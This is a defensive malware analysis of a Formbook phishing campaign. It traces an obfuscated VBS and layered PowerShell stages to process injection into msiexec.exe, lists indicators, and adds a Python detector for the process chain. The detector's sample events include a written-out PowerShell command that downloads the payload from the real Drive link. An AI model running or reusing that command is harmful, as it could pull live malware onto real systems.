Formbook Malware Campaign Uses Malicious ZIP Files and Layered Scripting Techniques

A new campaign leveraging Formbook malware has emerged, showcasing sophisticated multi-stage infection tactics that underscore the importance of analyzing more than just executable files during malware investigations.

When teaching malware reverse-engineering in courses like SANS FOR610, it’s critical to stress that reverse engineering applies to every component in the infection chain, not just PE or ELF binaries. This recent attack chain highlights exactly why.

The infection begins with a phishing email containing a ZIP archive attachment. The ZIP file harbors a single, deceptively named script: Payment_confirmation_copy_30K__202512110937495663904650431.vbs.

This file’s obfuscated nature and low antivirus detection rate (only 17 out of 65 engines flagged it on VirusTotal) demonstrate the threat’s evasiveness.

VBS Script Obfuscation Tactics

Opening the VBS file reveals classic anti-analysis tricks. The script kicks off with a custom delay loop, implemented using the DateAdd and Wscript.Sleep functions.

This 9-second pause helps bypass detection mechanisms, which often flag the standard sleep function as suspicious. After the delay, the script begins constructing a heavily obfuscated PowerShell payload.

String concatenation obscures the actual command, hiding keywords like “PowerShell” behind mathematical manipulations of character codes.

Through this method, the script gradually builds a new series of commands intended for execution via Shell.Application, further complicating static analysis.

Highly Obfuscated PowerShell

When executed, the generated PowerShell script continues the obfuscation pattern. Notably, two functions, Microcoulomb and Blokbogstavers65, are central to this complexity.

The Microcoulomb function cleverly reconstructs strings by extracting specific characters from its input, producing critical keywords required for subsequent payload operations.

For instance, the reconstructed variable, after repeated processing, reveals “nET.wEBClIent”, a core component for network communications.

Blokbogstavers65 simplifies matters by serving as an entry point to Invoke-Expression, executing the dynamically crafted code segments. This layered obfuscation allows attackers to evade both automated and manual scrutiny.

The payload download mechanism is wrapped in a loop that repeatedly attempts to fetch a file from hxxps://drive[.]google[.]com/uc?export=download&id=1jFn0CatcuICOIjBsP_WxcI_faBI9WA9S.

Once acquired, it is stored as C:\Users\REM\AppData\Roaming\budene.con. Decoding this file uncovers yet another PowerShell script, maintaining the chain of obfuscation and stalling detection.

Formbook Deployment via Process Injection

The ultimate step leverages process injection. The script launches msiexec.exe, into which it injects the Formbook malware.

The injected binary C:\Users\REM\AppData\Local\Temp\bin.exe (SHA256: 12a0f592ba833fb80cc286e28a36dcdef041b7fc086a7988a02d9d55ef4c0a9d) communicates with its command and control server at 216[.]250[.]252[.]227:7719.

The use of legitimate processes and memory injection enables the malware to operate stealthily, bypassing most traditional endpoint defenses.
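The process chain described above (wscript.exe running the ZIP-delivered .vbs, spawning an obfuscated PowerShell stage, which in turn launches msiexec.exe as the injection host) is exactly what endpoint telemetry can be checked for. The following is an added example, not code from the write-up or from SANS: a small detector run over constructed process-creation events whose field names are assumed to loosely follow Sysmon Event ID 1; the paths, PIDs and command lines in the sample are constructed for illustration.

```python
import re
# Parent/child pairs from the chain above: the .vbs under wscript.exe spawns
# PowerShell, which launches msiexec.exe as the Formbook injection host.
SUSPICIOUS_PARENT_CHILD = {
    ("wscript.exe", "powershell.exe"): "VBS script launched PowerShell",
    ("powershell.exe", "msiexec.exe"): "PowerShell launched msiexec.exe (injection host)",
}
# Download-stage markers; case-insensitive because the loader hides keywords
# such as "nET.wEBClIent" behind mixed casing.
CMDLINE_MARKERS = re.compile(r"net\.webclient|downloadstring|downloadfile|invoke-expression|\biex\b", re.I)

def _image_name(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()  # lower-cased file name

def ancestry(events, pid):
    """Image names from the given process up through its recorded ancestors."""
    by_pid = {ev["ProcessId"]: ev for ev in events}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(_image_name(by_pid[pid]["Image"]))
        pid = by_pid[pid]["ParentProcessId"]
    return chain

def analyze_events(events):
    """Return (ProcessId, reason) findings for a list of process-creation events."""
    findings = []
    for ev in events:
        pid, child = ev["ProcessId"], _image_name(ev["Image"])
        pair = (_image_name(ev["ParentImage"]), child)
        if pair in SUSPICIOUS_PARENT_CHILD:
            findings.append((pid, SUSPICIOUS_PARENT_CHILD[pair]))
        if CMDLINE_MARKERS.search(ev["CommandLine"]):
            findings.append((pid, "download/execution markers in command line"))
        # Whole chain: msiexec.exe with both PowerShell and wscript among its ancestors.
        if child == "msiexec.exe" and {"powershell.exe", "wscript.exe"} <= set(ancestry(events, pid)):
            findings.append((pid, "msiexec.exe descends from wscript.exe -> powershell.exe"))
    return findings

# Constructed sample events (field names loosely modelled on Sysmon Event ID 1).
SAMPLE_EVENTS = [
    {"ProcessId": 4100, "ParentProcessId": 1200, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r'wscript.exe "C:\Users\REM\Desktop\Payment_confirmation_copy_30K__202512110937495663904650431.vbs"'},
    {"ProcessId": 4212, "ParentProcessId": 4100, "ParentImage": r"C:\Windows\System32\wscript.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -w hidden -c \"(New-Object nET.wEBClIent).DownloadFile('https://drive.google.com/uc?export=download&id=1jFn0CatcuICOIjBsP_WxcI_faBI9WA9S', 'C:\\Users\\REM\\AppData\\Roaming\\budene.con')\""},
    {"ProcessId": 4388, "ParentProcessId": 4212, "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "Image": r"C:\Windows\System32\msiexec.exe", "CommandLine": "msiexec.exe"},
]
```

Running `analyze_events(SAMPLE_EVENTS)` flags the PowerShell stage twice (its wscript.exe parent and its command line) and msiexec.exe twice (its PowerShell parent and the full wscript -> powershell -> msiexec ancestry), while the wscript.exe event itself produces nothing on its own.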

This campaign demonstrates the necessity for security analysts to apply reverse-engineering skills throughout the entire infection chain, from scripts and PowerShell payloads to final executables.

Obfuscation, anti-analysis delays, and multi-stage script execution complicate detection and analysis efforts, highlighting why defenders must scrutinize every file and process involved in an incident.

Only by unraveling each layer can analysts fully reveal the tactics, techniques, and procedures leveraged by modern malware authors, such as those behind Formbook.
